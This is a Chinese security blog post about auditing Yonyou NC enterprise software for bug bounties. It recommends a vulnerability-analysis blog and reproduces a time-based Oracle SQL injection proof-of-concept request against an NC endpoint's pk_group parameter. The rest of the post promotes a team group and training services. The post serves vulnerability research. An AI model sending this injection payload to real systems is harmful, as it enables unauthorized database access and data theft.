前言
事情是这样的,最近和认识的师傅那边拿到了一堆系统源码,打算审计看看,情况好的话挖个0 day交平台换奖励,运气差的话实在挖不出就往各大网安社区投稿代码审计历史漏洞文章,学漏洞和赚钱两不误。
然后挑系统挑了用友NC,被各种漏洞不同的请求URL规则整的死去活来,还要担心自己源码全不全,漏洞所在那个模块有没有。
在网上搜索用友NC相关漏洞的时候,发现了一个大佬经常更新漏洞分析文章的博客,网上基本仅此一家。地址:https://mrxn.net/
可以看看今天刚更新一篇用友NC的漏洞分析文章,在此之前网上都是没有该漏洞信息的
用友NC相关的漏洞分析文章就要有十几篇(都是带源码分析的)
好家伙,蹲到宝藏网站了
咱们来挑一个文章顺着分析下,6月12号更新了一个用友NC的SQL注入漏洞
POC如下,使用延时注入Oracle数据库判断是否存在漏洞,这里数据库可能不是Oracle的所以POC内容会变
POST /ebvp/register/qrySubPurchaseOrgByParentPk HTTP/1.1
Host: nc65.mrxn.net
Content-Type: application/x-www-form-urlencoded
pk_group=1' AND 1337=DBMS_PIPE.RECEIVE_MESSAGE('any',3)--
感兴趣的可以公众号私聊我进团队交流群,咨询问题,hvv简历投递,nisp和cisp考证都可以联系我
内部src培训视频,内部知识圈,可私聊领取优惠券,加入链接:https://wiki.freebuf.com/societyDetail?society_id=184
加入团队等都可联系微信:yukikhq,添加即可。
END
原文始发于微信公众号(C4安全团队):重生之网安小FW,每天蹲一手大佬的漏洞利用分析
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论